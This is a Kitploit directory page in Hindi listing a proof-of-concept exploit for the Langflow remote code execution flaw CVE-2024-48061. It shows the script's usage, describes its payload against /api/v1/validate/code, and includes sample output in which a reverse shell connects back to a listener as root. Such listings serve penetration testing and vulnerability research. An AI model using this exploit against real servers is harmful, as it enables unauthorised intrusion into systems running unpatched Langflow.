Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-48061 — CVE-2024-48061 Langflow vulnerable to remote code execution. Poc | Kitploit
उपकरण/GitHubGitHub/bwithe/cve-2024-48061
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubbwithe/cve-2024-48061

CVE-2024-48061

CVE-2024-48061 Langflow vulnerable to remote code execution. Poc

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-48061 Langflow दूरस्थ कोड निष्पादन के लिए संवेदनशील

CVE-2024-48061 poc

उपयोग

root@kitploit:~
python3 poc.py -i <web_ip> -p <web_port> -l <listener_ip> -lp <listener_port>

विवरण

यह स्क्रिप्ट लक्ष्य वेब सर्वर पर /api/v1/validate/code पर एक संवेदनशील API एंडपॉइंट का शोषण करती है। यह पहले संवेदनशील पथ की उपस्थिति की पुष्टि करती है, फिर निर्दिष्ट श्रोता IP और पोर्ट पर एक TCP श्रोता शुरू करती है। एक बार श्रोता तैयार हो जाने पर, यह लक्ष्य को एक विशेष रूप से तैयार किया गया पेलोड भेजती है ताकि श्रोता से वापस जुड़ने वाला एक रिवर्स शेल उत्पन्न हो सके।

उदाहरण

  • सफल प्रयास
root@kitploit:~
python3 poc3.py -i 192.168.0.2 -p 7860 -l 192.168.0.3 -lp 4444
[+] Vulnerability detected at http://192.168.0.2:7860/api/v1/validate/code
[+] Listening on 192.168.0.3:4444 ...
[+] Sending payload to http://192.168.0.2:7860/api/v1/validate/code
[+] Connection from 192.168.0.2:60440
# whoami
whoami
root
# exit
[*] Exiting shell.
  • असफल प्रयास
root@kitploit:~
python3 poc3.py -i 192.168.0.2 -p 7860 -l 192.168.0.3 -lp 4444
[-] Doesn't look vulnerable
टूल डाउनलोड करें